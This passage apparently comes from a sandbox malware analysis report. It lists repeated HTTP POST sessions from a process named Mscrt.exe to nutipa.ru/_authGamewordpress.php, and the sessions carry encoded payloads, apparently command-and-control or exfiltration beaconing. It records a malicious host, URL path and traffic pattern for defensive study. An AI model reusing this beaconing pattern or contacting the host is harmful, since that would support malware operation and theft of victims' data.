Dec 15, 2024 04:18:35.873272896 CET	1424	OUT	Data Raw: 50 54 43 5a 5f 59 5d 51 5d 5a 56 51 50 51 57 55 55 51 5e 43 5a 51 5b 5f 59 59 5d 5a 54 5c 59 52 58 58 57 5f 5e 53 57 51 42 56 52 59 5d 54 5e 53 55 5d 58 5c 58 5f 5a 5d 57 58 56 5b 58 50 55 59 5d 58 5a 5a 56 59 50 5c 5a 59 5d 53 5b 5b 5e 5a 55 5f Data Ascii: PTCZ_Y]Q]ZVQPQWUUQ^CZQ[_YY]ZT\YRXXW_^SWQBVRY]T^SU]X\X_Z]WXV[XPUY]XZZVYP\ZY]S[[^ZU_ZXP_U_S^PR]STS_Z_]P_]]XTFW\[A_]\XQCSSUZS]__XBT\R_W]]T\]^QUTDZ_Z_W^VX[[]]CS][RX][YD^]VUXQV^Q]WT[^^P[P]^$_?"*6)(=8 Y#&12-)#0.<#:-;.F'#P
Dec 15, 2024 04:18:36.613465071 CET	25	IN	HTTP/1.1 100 Continue
Dec 15, 2024 04:18:36.846963882 CET	943	IN	HTTP/1.1 200 OK Date: Sun, 15 Dec 2024 03:18:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5fBroTgLoAuzCy2Uh7MV0Arr1WL2ZJdowoGDO903KLvZ7Zkm9Dp0LEHHC4V5nA87wsf%2BEkKmy8MCMsYd2CHh%2BEVycKnyDJVfWl1v%2BY5bQqkxbFYo7rYhS46GN9I%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f23498dd8f21869-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3972&min_rtt=1624&rtt_var=5306&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=1744&delivery_rate=71519&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 06 1f 3a 03 36 03 32 53 20 00 33 0a 2d 2f 31 14 29 20 3b 19 24 21 3e 02 27 28 3b 5d 29 3d 20 0f 31 2a 32 06 34 1c 21 54 3c 27 07 58 25 36 21 51 03 11 22 59 24 2d 33 01 3d 3a 28 5d 26 1f 33 5d 32 04 24 5c 3f 2b 31 09 33 01 34 0b 20 3e 3b 0b 2e 5c 20 10 28 5c 37 5e 3a 00 39 0d 23 0c 2e 53 0c 17 25 10 28 39 3a 5e 21 22 1b 13 25 2c 11 54 23 07 2e 55 29 30 34 54 30 1d 0a 0d 27 10 3f 0f 20 30 0b 56 32 03 2a 5e 23 32 0b 0c 3e 08 25 5c 20 05 2e 52 03 34 5d 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 98:62S 3-/1) ;$!>'(;])= 124!T<'X%6!Q"Y$-3=:(]&3]2$\?+134 >;.\ (\7^:9#.S%(9:^!"%,T#.U)04T0'? 0V2^#2>%\ .R4]T0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.4	49891	172.67.185.214	80	3084	C:\ComponentReviewperfmonitor\Mscrt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 04:18:35.650115967 CET	320	OUT	POST /_authGamewordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: nutipa.ru Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 15, 2024 04:18:35.998095989 CET	2536	OUT	Data Raw: 55 54 46 58 5f 5e 5d 53 5d 5a 56 51 50 59 57 5b 55 51 5e 41 5a 51 5b 59 59 59 5d 5a 54 5c 59 52 58 58 57 5f 5e 53 57 51 42 56 52 59 5d 54 5e 53 55 5d 58 5c 58 5f 5a 5d 57 58 56 5b 58 50 55 59 5d 58 5a 5a 56 59 50 5c 5a 59 5d 53 5b 5b 5e 5a 55 5f Data Ascii: UTFX_^]S]ZVQPYW[UQ^AZQ[YYY]ZT\YRXXW_^SWQBVRY]T^SU]X\X_Z]WXV[XPUY]XZZVYP\ZY]S[[^ZU_ZXP_U_S^PR]STS_Z_]P_]]XTFW\[A_]\XQCSSUZS]__XBT\R_W]]T\]^QUTDZ_Z_W^VX[[]]CS][RX][YD^]VUXQV^Q]WT[^^P[P]^'+>:X);]6?&+.4!/#1>Y%=1Q=$'.^?U>-+.F'#P #
Dec 15, 2024 04:18:36.738423109 CET	25	IN	HTTP/1.1 100 Continue
Dec 15, 2024 04:18:36.982558966 CET	790	IN	HTTP/1.1 200 OK Date: Sun, 15 Dec 2024 03:18:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AjBPFQb33sl9pmqpgi%2B3Qdjf4b0wPBZk5DLBHsDoil6w2wwxf2YbEwmSRVxEcZez9fCQMEY1C4vIrvxFTWKJnCVzEG5ztfBJkdfy4k4Q0UWeIUm8HZJUfKeHK68%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f23498ea8ab424b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4345&min_rtt=2053&rtt_var=5355&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2856&delivery_rate=71586&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 44W@T0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.4	49897	172.67.185.214	80	3084	C:\ComponentReviewperfmonitor\Mscrt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 04:18:37.230973005 CET	296	OUT	POST /_authGamewordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: nutipa.ru Content-Length: 2536 Expect: 100-continue
Dec 15, 2024 04:18:37.576242924 CET	2536	OUT	Data Raw: 50 51 46 5b 5f 58 58 57 5d 5a 56 51 50 5f 57 56 55 53 5e 44 5a 53 5b 58 59 59 5d 5a 54 5c 59 52 58 58 57 5f 5e 53 57 51 42 56 52 59 5d 54 5e 53 55 5d 58 5c 58 5f 5a 5d 57 58 56 5b 58 50 55 59 5d 58 5a 5a 56 59 50 5c 5a 59 5d 53 5b 5b 5e 5a 55 5f Data Ascii: PQF[_XXW]ZVQP_WVUS^DZS[XYY]ZT\YRXXW_^SWQBVRY]T^SU]X\X_Z]WXV[XPUY]XZZVYP\ZY]S[[^ZU_ZXP_U_S^PR]STS_Z_]P_]]XTFW\[A_]\XQCSSUZS]__XBT\R_W]]T\]^QUTDZ_Z_W^VX[[]]CS][RX][YD^]VUXQV^Q]WT[^^P[P]^$])->X=7#?*C</4,7%X%%-.>Z0=&X(%V,.F'#P
Dec 15, 2024 04:18:38.317275047 CET	25	IN	HTTP/1.1 100 Continue
Dec 15, 2024 04:18:38.565881014 CET	794	IN	HTTP/1.1 200 OK Date: Sun, 15 Dec 2024 03:18:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sXkLCJQm58FJ%2FO4SyReqmcAMQWiZWoqIzFhOon2Njt2EICjI8Z0N9MP57fbx2RHvU7DRZJlidyeo%2Fzj48AExTdqePmIGPXR1IWsbON9%2F2dZ4KHXH48o4U8YRjyY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2349988acf4235-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4101&min_rtt=1764&rtt_var=5337&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=71337&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 44W@T0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.4	49899	172.67.185.214	80	3084	C:\ComponentReviewperfmonitor\Mscrt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 04:18:38.812721014 CET	320	OUT	POST /_authGamewordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: nutipa.ru Content-Length: 2532 Expect: 100-continue Connection: Keep-Alive
Dec 15, 2024 04:18:39.170049906 CET	2532	OUT	Data Raw: 50 5e 43 5f 5f 58 5d 52 5d 5a 56 51 50 58 57 5b 55 5c 5e 46 5a 5e 5b 5f 59 59 5d 5a 54 5c 59 52 58 58 57 5f 5e 53 57 51 42 56 52 59 5d 54 5e 53 55 5d 58 5c 58 5f 5a 5d 57 58 56 5b 58 50 55 59 5d 58 5a 5a 56 59 50 5c 5a 59 5d 53 5b 5b 5e 5a 55 5f Data Ascii: P^C__X]R]ZVQPXW[U\^FZ^[_YY]ZT\YRXXW_^SWQBVRY]T^SU]X\X_Z]WXV[XPUY]XZZVYP\ZY]S[[^ZU_ZXP_U_S^PR]STS_Z_]P_]]XTFW\[A_]\XQCSSUZS]__XBT\R_W]]T\]^QUTDZ_Z_W^VX[[]]CS][RX][YD^]VUXQV^Q]WT[^^P[P]^$(2?:5?6(=7X7\2'>1)80.!=#;.F'#P
Dec 15, 2024 04:18:39.894788027 CET	25	IN	HTTP/1.1 100 Continue
Dec 15, 2024 04:18:40.127579927 CET	796	IN	HTTP/1.1 200 OK Date: Sun, 15 Dec 2024 03:18:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LJovxUXUeWvXQV2cj410mUQpVlN%2F%2BNtbhJ4x8ogE0EuzFiYcbHX%2FrDJ4pOtJuQRjTAcwvPKRFbDGolaxwX0hA2Wt%2FkksqcptYg3fSup1gumbQ87oOXmyUMpsssE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2349a26c1c0f6b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4095&min_rtt=1665&rtt_var=5485&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2852&delivery_rate=69164&cwnd=209&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 44W@T0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.4	49904	172.67.185.214	80	3084	C:\ComponentReviewperfmonitor\Mscrt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 04:18:40.371284008 CET	320	OUT	POST /_authGamewordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: nutipa.ru Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 15, 2024 04:18:40.716929913 CET	2536	OUT	Data Raw: 50 52 43 51 5f 5e 5d 56 5d 5a 56 51 50 5c 57 50 55 57 5e 40 5a 57 5b 5a 59 59 5d 5a 54 5c 59 52 58 58 57 5f 5e 53 57 51 42 56 52 59 5d 54 5e 53 55 5d 58 5c 58 5f 5a 5d 57 58 56 5b 58 50 55 59 5d 58 5a 5a 56 59 50 5c 5a 59 5d 53 5b 5b 5e 5a 55 5f Data Ascii: PRCQ_^]V]ZVQP\WPUW^@ZW[ZYY]ZT\YRXXW_^SWQBVRY]T^SU]X\X_Z]WXV[XPUY]XZZVYP\ZY]S[[^ZU_ZXP_U_S^PR]STS_Z_]P_]]XTFW\[A_]\XQCSSUZS]__XBT\R_W]]T\]^QUTDZ_Z_W^VX[[]]CS][RX][YD^]VUXQV^Q]WT[^^P[P]^$]+):'Y6<?#4Y%:%:>#_0><U,.F'#P 7
Dec 15, 2024 04:18:41.462100029 CET	25	IN	HTTP/1.1 100 Continue
Dec 15, 2024 04:18:41.709382057 CET	802	IN	HTTP/1.1 200 OK Date: Sun, 15 Dec 2024 03:18:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EWs8MHH%2FAde5b1iJKKx%2F8L%2B7VTB1TDHgEe69IwLuf3FTPzddbJA2TQbnpoqeRCR%2FQ5Z5JXGCvez6Q4KtqmS3GrzG9VpDudYvE9%2BHCx725r1hivP0c%2F%2BtUMgOjuQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2349ac2e6a42c3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3395&min_rtt=1625&rtt_var=4149&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2856&delivery_rate=92492&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 44W@T0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.4	49910	172.67.185.214	80	3084	C:\ComponentReviewperfmonitor\Mscrt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 04:18:41.979728937 CET	320	OUT	POST /_authGamewordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: nutipa.ru Content-Length: 1412 Expect: 100-continue Connection: Keep-Alive
Dec 15, 2024 04:18:42.326411009 CET	1412	OUT	Data Raw: 50 54 43 5a 5f 5d 5d 54 5d 5a 56 51 50 58 57 52 55 54 5e 44 5a 51 5b 5c 59 59 5d 5a 54 5c 59 52 58 58 57 5f 5e 53 57 51 42 56 52 59 5d 54 5e 53 55 5d 58 5c 58 5f 5a 5d 57 58 56 5b 58 50 55 59 5d 58 5a 5a 56 59 50 5c 5a 59 5d 53 5b 5b 5e 5a 55 5f Data Ascii: PTCZ_]]T]ZVQPXWRUT^DZQ[\YY]ZT\YRXXW_^SWQBVRY]T^SU]X\X_Z]WXV[XPUY]XZZVYP\ZY]S[[^ZU_ZXP_U_S^PR]STS_Z_]P_]]XTFW\[A_]\XQCSSUZS]__XBT\R_W]]T\]^QUTDZ_Z_W^VX[[]]CS][RX][YD^]VUXQV^Q]WT[^^P[P]^$[<*[=)##/=?='#/3%X22>:)00']?9,.F'#P #
Dec 15, 2024 04:18:43.064153910 CET	25	IN	HTTP/1.1 100 Continue
Dec 15, 2024 04:18:43.317318916 CET	941	IN	HTTP/1.1 200 OK Date: Sun, 15 Dec 2024 03:18:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tkKdhfFolna8MYzWrsRr3btDuOWYMttRyvwnqNMvUFjw47XKFjRtNZNQ1e%2B4HDKWd2sAqpqUvbATXkuk8R5oxPg4MQy%2BMFUtpWjzFEddLvwGJ4eMrqXLf5ch2mE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2349b63b80432c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4307&min_rtt=1629&rtt_var=5968&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1732&delivery_rate=63315&cwnd=192&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 06 1f 39 5c 36 29 22 56 21 2d 2f 0d 39 2f 22 0f 3f 30 27 1a 30 1c 2a 01 25 38 2b 1b 3d 2d 09 1c 32 39 25 59 37 21 29 54 3e 24 36 03 31 0c 21 51 03 11 22 13 26 58 20 5a 3e 39 28 5a 32 57 37 5e 32 03 24 1b 28 3b 39 0f 30 5e 3f 1e 20 3d 3c 52 3a 5c 30 5b 3c 29 23 5f 2e 3e 00 50 37 0c 2e 53 0c 17 25 5d 3c 29 32 13 37 1c 17 50 30 3f 2b 57 23 39 08 1e 3f 33 27 0e 27 23 24 0e 24 58 28 1b 21 23 21 1b 25 29 3e 5b 20 0c 0b 0d 3e 18 25 5c 20 05 2e 52 03 34 5d 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 989\6)"V!-/9/"?0'0*%8+=-29%Y7!)T>$61!Q"&X Z>9(Z2W7^2$(;90^? =<R:\0[<)#_.>P7.S%]<)27P0?+W#9?3''#$$X(!#!%)>[ >%\ .R4]T0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.4	49912	172.67.185.214	80	3084	C:\ComponentReviewperfmonitor\Mscrt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 04:18:42.234488964 CET	320	OUT	POST /_authGamewordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: nutipa.ru Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 15, 2024 04:18:42.592133045 CET	2536	OUT	Data Raw: 50 5e 46 5f 5f 57 58 52 5d 5a 56 51 50 5b 57 55 55 57 5e 45 5a 57 5b 58 59 59 5d 5a 54 5c 59 52 58 58 57 5f 5e 53 57 51 42 56 52 59 5d 54 5e 53 55 5d 58 5c 58 5f 5a 5d 57 58 56 5b 58 50 55 59 5d 58 5a 5a 56 59 50 5c 5a 59 5d 53 5b 5b 5e 5a 55 5f Data Ascii: P^F__WXR]ZVQP[WUUW^EZW[XYY]ZT\YRXXW_^SWQBVRY]T^SU]X\X_Z]WXV[XPUY]XZZVYP\ZY]S[[^ZU_ZXP_U_S^PR]STS_Z_]P_]]XTFW\[A_]\XQCSSUZS]__XBT\R_W]]T\]^QUTDZ_Z_W^VX[[]]CS][RX][YD^]VUXQV^Q]WT[^^P[P]^'(=&=*7X""C(-\4?\%X.%==>($.]+5S;.F'#P +
Dec 15, 2024 04:18:43.321604967 CET	25	IN	HTTP/1.1 100 Continue
Dec 15, 2024 04:18:43.567826033 CET	794	IN	HTTP/1.1 200 OK Date: Sun, 15 Dec 2024 03:18:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bnCKyvB34XfWpzytMOmyXqWfuFOsasb9ycs1JdGwBgHhE5J8CqqSSSHLCfm75tpGSnMUttaHP6rKVmEB%2B4OzakLcxYg42kjZUeIUHe1%2BZW4kvhWsCEI65W%2FZh8I%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2349b7ccf27ca2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3652&min_rtt=1887&rtt_var=4238&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2856&delivery_rate=91193&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 44W@T0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.4	49917	172.67.185.214	80	3084	C:\ComponentReviewperfmonitor\Mscrt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 04:18:43.804250956 CET	296	OUT	POST /_authGamewordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: nutipa.ru Content-Length: 2536 Expect: 100-continue
Dec 15, 2024 04:18:44.154495955 CET	2536	OUT	Data Raw: 55 57 43 5b 5f 57 5d 56 5d 5a 56 51 50 5e 57 50 55 52 5e 48 5a 51 5b 5b 59 59 5d 5a 54 5c 59 52 58 58 57 5f 5e 53 57 51 42 56 52 59 5d 54 5e 53 55 5d 58 5c 58 5f 5a 5d 57 58 56 5b 58 50 55 59 5d 58 5a 5a 56 59 50 5c 5a 59 5d 53 5b 5b 5e 5a 55 5f Data Ascii: UWC[_W]V]ZVQP^WPUR^HZQ[[YY]ZT\YRXXW_^SWQBVRY]T^SU]X\X_Z]WXV[XPUY]XZZVYP\ZY]S[[^ZU_ZXP_U_S^PR]STS_Z_]P_]]XTFW\[A_]\XQCSSUZS]__XBT\R_W]]T\]^QUTDZ_Z_W^VX[[]]CS][RX][YD^]VUXQV^Q]WT[^^P[P]^'?>^*5<@<!?''=&1&)3('-6<",.F'#P ?
Dec 15, 2024 04:18:44.959680080 CET	25	IN	HTTP/1.1 100 Continue
Dec 15, 2024 04:18:45.205066919 CET	790	IN	HTTP/1.1 200 OK Date: Sun, 15 Dec 2024 03:18:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jOUmpXfvMuj205Li3KnEWLKX4Q5LbMGKbJBcktCCczTgbZZ3NCUaeP0ZKkng7Xb9PxKsM3e5J7dMayZ1BZnvRopJvE64pQJCT5N8t%2B2TY4wbe30E26a4MsqWRqQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2349c20c617cf4-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4292&min_rtt=1824&rtt_var=5620&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=67689&cwnd=213&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 44W@T0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.4	49920	172.67.185.214	80	3084	C:\ComponentReviewperfmonitor\Mscrt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 04:18:45.503062963 CET	320	OUT	POST /_authGamewordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: nutipa.ru Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 15, 2024 04:18:45.857398987 CET	2536	OUT	Data Raw: 50 53 43 58 5a 5c 58 54 5d 5a 56 51 50 5c 57 56 55 56 5e 40 5a 57 5b 5c 59 59 5d 5a 54 5c 59 52 58 58 57 5f 5e 53 57 51 42 56 52 59 5d 54 5e 53 55 5d 58 5c 58 5f 5a 5d 57 58 56 5b 58 50 55 59 5d 58 5a 5a 56 59 50 5c 5a 59 5d 53 5b 5b 5e 5a 55 5f Data Ascii: PSCXZ\XT]ZVQP\WVUV^@ZW[\YY]ZT\YRXXW_^SWQBVRY]T^SU]X\X_Z]WXV[XPUY]XZZVYP\ZY]S[[^ZU_ZXP_U_S^PR]STS_Z_]P_]]XTFW\[A_]\XQCSSUZS]__XBT\R_W]]T\]^QUTDZ_Z_W^VX[[]]CS][RX][YD^]VUXQV^Q]WT[^^P[P]^')-[=#<-(-87#'.-'-2#'3*+W/.F'#P 7
Dec 15, 2024 04:18:46.590152979 CET	25	IN	HTTP/1.1 100 Continue
Dec 15, 2024 04:18:46.822841883 CET	805	IN	HTTP/1.1 200 OK Date: Sun, 15 Dec 2024 03:18:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nyZUDKLesxh2iY%2FjcUgZdzFMxLCA%2BrQw1%2FBT9mxn33PlSDxh%2BP%2Bg3x99o%2BPeGCaehDc2ARx6MpHibNaY19dEE4RmbHrVOGmAbsp46HY%2Fh4%2FkhGbvcwTd7aFome8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2349cc3dd943f8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3383&min_rtt=1782&rtt_var=3870&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2856&delivery_rate=100061&cwnd=213&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 44W@T0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.4	49925	172.67.185.214	80	3084	C:\ComponentReviewperfmonitor\Mscrt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 04:18:47.068002939 CET	320	OUT	POST /_authGamewordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: nutipa.ru Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 15, 2024 04:18:47.420629025 CET	2536	OUT	Data Raw: 50 5e 46 5c 5f 5c 58 52 5d 5a 56 51 50 59 57 5b 55 5d 5e 49 5a 5f 5b 5d 59 59 5d 5a 54 5c 59 52 58 58 57 5f 5e 53 57 51 42 56 52 59 5d 54 5e 53 55 5d 58 5c 58 5f 5a 5d 57 58 56 5b 58 50 55 59 5d 58 5a 5a 56 59 50 5c 5a 59 5d 53 5b 5b 5e 5a 55 5f Data Ascii: P^F\_\XR]ZVQPYW[U]^IZ_[]YY]ZT\YRXXW_^SWQBVRY]T^SU]X\X_Z]WXV[XPUY]XZZVYP\ZY]S[[^ZU_ZXP_U_S^PR]STS_Z_]P_]]XTFW\[A_]\XQCSSUZS]__XBT\R_W]]T\]^QUTDZ_Z_W^VX[[]]CS][RX][YD^]VUXQV^Q]WT[^^P[P]^$\?2Z>4!<!)='\4?]&.%2-%Q>/%-:]( )V/+.F'#P #
Dec 15, 2024 04:18:48.153503895 CET	25	IN	HTTP/1.1 100 Continue
Dec 15, 2024 04:18:48.397249937 CET	805	IN	HTTP/1.1 200 OK Date: Sun, 15 Dec 2024 03:18:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ipARWOsiKcDds7V0nhrSaZ0MMb%2B8lVJEUGjBPtzlLSBZkY3iP%2F47z%2FqFCmG9rtsX1%2FXAfZzwaY1QiXcLf%2F1pcVC8p%2FXItMKb8uTctO3hCcM5SOJS9StR39hu%2F%2B8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2349d60be37d1a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3144&min_rtt=1783&rtt_var=3392&sent=4&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2856&delivery_rate=115169&cwnd=178&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 44W@T0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.4	49930	172.67.185.214	80	3084	C:\ComponentReviewperfmonitor\Mscrt.exe

Timestamp	Bytes transferred	Direction	Data
